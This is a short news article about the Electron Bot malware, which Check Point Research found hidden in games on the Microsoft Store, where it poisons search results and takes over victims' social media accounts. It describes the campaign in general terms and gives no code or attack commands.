A new malware that can take control of your social media accounts has been discovered circulating in around 20 countries. As per a report by cybersecurity researchers from Check Point Research (CPR) a malware dubbed as Electron Bot, is being disturbed on PCs through Microsoft Store. The report mentions that there are several malicious apps and games available on tech giant’s platform that carry this dangerous malware. The report specifically mentions that the malware is found hidden in relatively popular games such as ‘Temple Run’ and ‘Subway Surfer’.
How Electron Bot malware works
The Electron Bot malware gets into a PC when a user downloads a game or app that contains the malware. Once downloaded, the app or game executes scripts that infests the PC with the malware. The primary purpose to hide the malwate with game is to avoid detection.
After the malware gets into your PC, it starts search engine optimisation (SEO) poisoning. For those who do not know, SEO poisoning is an attack method in which cybercriminals use search engine optimisation to boost search results for malicious websites that are packed with keywords. The malware also seizes your social media accounts to run promotions.
As per CPR, the malware was uploaded to public cloud storage, mediafire.com, through Bulgaria. The report further reveals that the malware campaign belongs to a Bulgarian wrestler and soccer player. The malware uses the social media accounts of victims to promote YouTube and SoundCloud accounts.
The Electron Bot malware has attacked more than 5,000 victims globally. The Electron framework provides Electron apps with access to all of the computer resources, including GPU computing. As the bot’s payload is loaded dynamically at every run time, the attackers can also modify the code and change the bots behavior to high risk. For example, they can initialize another second stage and drop a new malware such as ransomware or a RAT. All of this can happen without the victim’s knowledge.